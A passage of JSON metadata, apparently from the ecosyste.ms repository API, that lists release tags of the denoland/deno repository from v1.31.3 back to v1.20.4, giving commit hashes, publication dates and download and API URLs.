osyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":